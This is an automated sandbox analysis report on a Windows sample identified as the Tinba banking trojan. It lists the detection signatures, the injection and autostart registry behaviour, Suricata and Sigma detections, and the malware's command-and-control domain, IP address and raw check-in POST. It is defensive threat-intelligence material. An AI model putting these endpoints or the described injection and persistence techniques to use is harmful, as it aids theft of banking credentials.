Edit tour

Windows Analysis Report
Uredospore8.exe

Overview

General Information

Sample name:	Uredospore8.exe
Analysis ID:	1501381
MD5:	50c7ce412d99eb4769411d6b60a34ac6
SHA1:	551d077916a61780fb055f6e3b27c0f2ba4d3378
SHA256:	446156cab04d4f29ecee92429d9cba29e4403be17b677e74cde58e39e6487f20
Tags:	exe
Infos:

Detection

Tinba

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Tinba Banker

AI detected suspicious sample

Allocates memory in foreign processes

Contains functionality to inject threads in other processes

Creates a thread in another existing process (thread injection)

Creates autostart registry keys with suspicious names

Found direct / indirect Syscall (likely to bypass EDR)

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Hooks files or directories query functions (used to hide files and directories)

Hooks registry keys query functions (used to hide registry keys)

Injects code into the Windows Explorer (explorer.exe)

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies the prolog of user mode functions (user mode inline hooks)

Monitors registry run keys for changes

Sigma detected: Suspicious Process Parents

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Writes to foreign memory regions

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops certificate files (DER)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (may stop execution after checking a module file name)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

PE file contains an invalid checksum

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Remote Thread Creation By Uncommon Source Image

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara signature match

Classification

Process Tree

System is w10x64

Uredospore8.exe (PID: 3212 cmdline: "C:\Users\user\Desktop\Uredospore8.exe" MD5: 50C7CE412D99EB4769411D6B60A34AC6)

Uredospore8.exe (PID: 364 cmdline: "C:\Users\user\Desktop\Uredospore8.exe" MD5: 50C7CE412D99EB4769411D6B60A34AC6)

winver.exe (PID: 616 cmdline: winver MD5: B5471B0FB5402FC318C82C994C6BF84D)

explorer.exe (PID: 4004 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

bin.exe (PID: 7064 cmdline: "C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe" MD5: 73120A9C2658CFAB57CF191468A630A5)

bin.exe (PID: 2532 cmdline: "C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe" MD5: 73120A9C2658CFAB57CF191468A630A5)

bin.exe (PID: 2976 cmdline: "C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe" MD5: 73120A9C2658CFAB57CF191468A630A5)

sihost.exe (PID: 3368 cmdline: sihost.exe MD5: A21E7719D73D0322E2E7D61802CB8F80)

svchost.exe (PID: 3396 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 3448 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

ctfmon.exe (PID: 3676 cmdline: "ctfmon.exe" MD5: B625C18E177D5BEB5A6F6432CCF46FB3)

svchost.exe (PID: 3356 cmdline: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

StartMenuExperienceHost.exe (PID: 4652 cmdline: "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca MD5: 5CDDF06A40E89358807A2B9506F064D9)

RuntimeBroker.exe (PID: 4840 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)

SearchApp.exe (PID: 4964 cmdline: "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca MD5: 5E1C9231F1F1DCBA168CA9F3227D9168)

dllhost.exe (PID: 424 cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} MD5: 08EB78E5BE019DF044C26B14703BD1FA)

RuntimeBroker.exe (PID: 4300 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)

RuntimeBroker.exe (PID: 5524 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)

smartscreen.exe (PID: 5568 cmdline: C:\Windows\System32\smartscreen.exe -Embedding MD5: 02FB7069B8D8426DC72C9D8A495AF55A)

ApplicationFrameHost.exe (PID: 5400 cmdline: C:\Windows\system32\ApplicationFrameHost.exe -Embedding MD5: D58A8A987A8DAFAD9DC32A548CC061E7)

WinStore.App.exe (PID: 4028 cmdline: "C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe" -ServerName:App.AppXc75wvwned5vhz4xyxxecvgdjhdkgsdza.mca MD5: 6C44453CD661FC2DB18E4C09C4940399)

RuntimeBroker.exe (PID: 2972 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)

svchost.exe (PID: 3696 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

TextInputHost.exe (PID: 6588 cmdline: "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca MD5: F050189D49E17D0D340DE52E9E5B711F)

conhost.exe (PID: 5996 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: 0D698AF330FD17BEE3BF90011D49251D)

backgroundTaskHost.exe (PID: 7120 cmdline: "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppX4325622ft6437f3xfywcfxgbedfvpn0x.mca MD5: DA7063B17DBB8BBB3015351016868006)

RuntimeBroker.exe (PID: 4016 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)

TbOpfOXygan.exe (PID: 5672 cmdline: "C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

TbOpfOXygan.exe (PID: 5700 cmdline: "C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

TbOpfOXygan.exe (PID: 1372 cmdline: "C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

TbOpfOXygan.exe (PID: 3544 cmdline: "C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

TbOpfOXygan.exe (PID: 4616 cmdline: "C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

TbOpfOXygan.exe (PID: 6524 cmdline: "C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

TbOpfOXygan.exe (PID: 5720 cmdline: "C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

TbOpfOXygan.exe (PID: 3200 cmdline: "C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

TbOpfOXygan.exe (PID: 2800 cmdline: "C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

TbOpfOXygan.exe (PID: 2748 cmdline: "C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Tinba	F-Secure notes that TinyBanker or short Tinba is usually distributed through malvertising (advertising content that leads the user to sites hosting malicious threats), exploit kits and spam email campaigns. According to news reports, Tinba has been found targeting bank customers in the United States and Europe.If Tinba successfully infects a device, it can steal banking and personal information through webinjects. To do this, the malware monitors the user's browser activity and if specific banking portals are visited, Tinba injects code to present the victim with fake web forms designed to mimic the legitimate web site. The malware then tricks them into entering their personal information, log-in credentials, etc in the legitimate-looking page.Tinba may also display socially-usered messages to lure or pressure the user into entering their information on the fake page; for example, a message may be shown which attempts to convince the victim that funds were accidentally deposited to his account and must be refunded immediately.	No Attribution	http://contagiodump.blogspot.com/2012/06/amazon.html http://garage4hackers.com/entry.php?b=3086 http://securityintelligence.com/tinba-malware-reloaded-and-attacking-banks-around-the-world/ http://stopmalvertising.com/malware-reports/mini-analysis-of-the-tinybanker-tinba.html http://www.theregister.co.uk/2012/06/04/small_banking_trojan/	https://malpedia.caad.fkie.fraunhofer.de/details/win.tinba

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: winver.exe PID: 616	JoeSecurity_Tinba	Yara detected Tinba Banker	Joe Security
Process Memory Space: explorer.exe PID: 4004	ironshell_php	Semi-Auto-generated - file ironshell.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0xd168b:$s2: ~ Shell I 0x26c61e:$s2: ~ Shell I

Sigma Signatures

System Summary

Sigma detected: Suspicious Process Parents

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\Explorer.EXE, CommandLine: C:\Windows\Explorer.EXE, CommandLine|base64offset|contains: , Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: winver, ParentImage: C:\Windows\SysWOW64\winver.exe, ParentProcessId: 616, ParentProcessName: winver.exe, ProcessCommandLine: C:\Windows\Explorer.EXE, ProcessId: 4004, ProcessName: explorer.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\winver.exe, ProcessId: 616, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\E6B93DA9

Sigma detected: Remote Thread Creation By Uncommon Source Image

Source: Threat created

Author: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\explorer.exe, SourceProcessId: 4004, StartAddress: 1C094C, TargetImage: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe, TargetProcessId: 7064

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: winver, ParentImage: C:\Windows\SysWOW64\winver.exe, ParentProcessId: 616, ParentProcessName: winver.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, ProcessId: 3396, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE Tinba Checkin 2 - Source IP: 192.168.2.6 - Destination IP: 216.218.185.162

Timestamp:	2024-08-29T20:36:07.150947+0200
SID:	2020418
Severity:	1
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE [PTsecurity] Tinba Checkin 4 - Source IP: 192.168.2.6 - Destination IP: 216.218.185.162

Timestamp:	2024-08-29T20:36:07.150947+0200
SID:	2024659
Severity:	1
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE W32/Chthonic CnC Activity - Source IP: 192.168.2.6 - Destination IP: 216.218.185.162

Timestamp:	2024-08-29T20:36:07.150947+0200
SID:	2830613
Severity:	1
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Uredospore8.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://lkebgoxdejyq.com/preview/

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe

Avira: detection malicious, Label: HEUR/AGEN.1335517

Multi AV Scanner detection for submitted file

Source: Uredospore8.exe

ReversingLabs: Detection: 86%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Uredospore8.exe

Joe Sandbox ML: detected

Source: C:\Windows\SysWOW64\winver.exe	Code function: 3_2_00D42ECB CryptAcquireContextA,CryptImportPublicKeyInfo,CryptCreateHash,CryptHashData,CryptVerifySignatureA,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,	3_2_00D42ECB
Source: C:\Windows\SysWOW64\winver.exe	Code function: 3_2_00D42DF8 CryptStringToBinaryA,CryptDecodeObjectEx,CryptAcquireContextA,CryptImportPublicKeyInfo,CryptCreateHash,CryptHashData,CryptVerifySignatureA,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,	3_2_00D42DF8
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 30_2_02142ECB CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptVerifySignatureA,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,	30_2_02142ECB
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 30_2_02142DF8 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptVerifySignatureA,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,	30_2_02142DF8

Source: Uredospore8.exe

Binary or memory string: -----BEGIN PUBLIC KEY----- MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAmKi9USd5qfAHO0EI7HVn RXX0UcpbQND9ufeTiNDdczkNZpvBWGqhwf9oPhq2VxGViSxK0b5FlXpKjlIf5w4S R2QDA7WsYcK65UQL9jl3zO52NqUXMBo0K3xEFpp3eAdJ2l73JrMRk+zcnOgXelAF A1L5nbioOBTcTNvaTqHeDTU5aeqyp/0edQ

Source: Uredospore8.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49715 version: TLS 1.0

Source:

Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: TbOpfOXygan.exe, 00000024.00000002.3341937192.000000000018E000.00000002.00000001.01000000.00000008.sdmp

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2020418 - Severity 1 - ET MALWARE Tinba Checkin 2 : 192.168.2.6:49711 -> 216.218.185.162:80
Source: Network traffic	Suricata IDS: 2024659 - Severity 1 - ET MALWARE [PTsecurity] Tinba Checkin 4 : 192.168.2.6:49711 -> 216.218.185.162:80
Source: Network traffic	Suricata IDS: 2830613 - Severity 1 - ETPRO MALWARE W32/Chthonic CnC Activity : 192.168.2.6:49711 -> 216.218.185.162:80

Source: global traffic

HTTP traffic detected: POST /preview/ HTTP/1.0Host: lkebgoxdejyq.comContent-Length: 157Data Raw: 18 1a 83 d8 90 1d 83 d8 e8 5e 57 53 1e 18 82 fb 28 2a b3 e8 28 2a b3 ee Data Ascii: ^WS(*(*

Source: Joe Sandbox View

IP Address: 216.218.185.162 216.218.185.162

Source: Joe Sandbox View

ASN Name: HURRICANEUS HURRICANEUS

Source: Joe Sandbox View

JA3 fingerprint: 1138de370e523e824bbca92d049a3777

Source: global traffic

HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHContent-type: text/xmlX-Agent-DeviceId: 01000A410900C4F3X-BM-CBT: 1696488253X-BM-DateFormat: dd/MM/yyyyX-BM-DeviceDimensions: 784x984X-BM-DeviceDimensionsLogical: 784x984X-BM-DeviceScale: 100X-BM-DTZ: 120X-BM-Market: CHX-BM-Theme: 000000;0078d7X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66EX-Device-ClientSession: 1D6F504B5A5A465DBDB84F31C63A581DX-Device-isOptin: falseX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-Device-OSSKU: 48X-Device-Touch: falseX-DeviceID: 01000A410900C4F3X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshldspcl40,msbdsborgv2co,msbwdsbi920cf,optfsth3,premsbdsbchtupcf,wsbfixcachec,wsbqfasmsall_c,wsbqfminiserp_c,wsbref-cX-MSEdge-ExternalExpType: JointCoordX-PositionerType: DesktopX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateX-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard TimeX-UserAgeClass: UnknownAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comContent-Length: 516Connection: Keep-AliveCache-Control: no-cacheCookie: SRCHUID=V=2&GUID=CE2BE0509FF742BD822F50D98AD10391&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231005; SRCHHPGUSR=SRCHLANG=en&HV=1696488191&IPMH=5767d621&IPMID=1696488252989&LUT=1696487541024; CortanaAppUID=2020E25DAB158E420BA06F1C8DEF7959; MUID=81C61E09498D41CC97CDBBA354824ED1; _SS=SID=1D9FAF807E686D422B86BC217FC66C71&CPID=1696488253968&AC=1&CPH=071f2185; _EDGE_S=SID=1D9FAF807E686D422B86BC217FC66C71; MUIDB=81C61E09498D41CC97CDBBA354824ED1

Source: unknown

HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49715 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\SysWOW64\winver.exe

Code function: 3_2_00D43084 send,send,recv,closesocket,

3_2_00D43084

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: lkebgoxdejyq.com

Source: unknown

Source: SearchApp.exe, 0000000D.00000000.2282517479.0000027A7E15E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRoot
Source: explorer.exe, 00000004.00000000.2195839667.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2195839667.000000000978C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: svchost.exe, 00000007.00000002.3379362084.000001F697FA4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000000.2222070333.000001F697FAC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000000.2222070333.000001F697FA4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3401335035.000001F69890B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000000.2222969318.000001F69890B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
Source: SearchApp.exe, 0000000D.00000000.2282353557.0000027A7E0DB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
Source: explorer.exe, 00000004.00000000.2195839667.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2195839667.000000000978C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: SearchApp.exe, 0000000D.00000000.2282353557.0000027A7E0DB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
Source: svchost.exe, 00000007.00000002.3379362084.000001F697FA4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000000.2222070333.000001F697FAC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000000.2222070333.000001F697FA4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3401335035.000001F69890B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000000.2222969318.000001F69890B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
Source: SearchApp.exe, 0000000D.00000000.2282353557.0000027A7E0DB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: explorer.exe, 00000004.00000000.2195839667.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2195839667.000000000978C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: svchost.exe, 00000007.00000002.3379362084.000001F697FA4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000000.2222070333.000001F697FAC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000000.2222070333.000001F697FA4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3401335035.000001F69890B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000000.2222969318.000001F69890B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
Source: explorer.exe, 00000004.00000000.2195839667.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2195839667.000000000978C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3379362084.000001F697FA4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000000.2222070333.000001F697FAC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000000.2222070333.000001F697FA4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3401335035.000001F69890B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000000.2222969318.000001F69890B000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2282353557.0000027A7E0DB000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2282517479.0000027A7E15E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000004.00000000.2195839667.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: SearchApp.exe, 0000000D.00000000.2273444241.000002727D37C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
Source: SearchApp.exe, 0000000D.00000000.2282425797.0000027A7E134000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: SearchApp.exe, 0000000D.00000000.2273444241.000002727D37C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.live.com/Web/
Source: explorer.exe, 00000004.00000000.2194969646.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2194982780.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2193205458.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, RuntimeBroker.exe, 0000000B.00000002.3372811032.000002C8A67C0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: svchost.exe, 00000006.00000000.2219376900.000001A798065000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3362446755.000001A798065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://%s.dnet.xboxlive.com
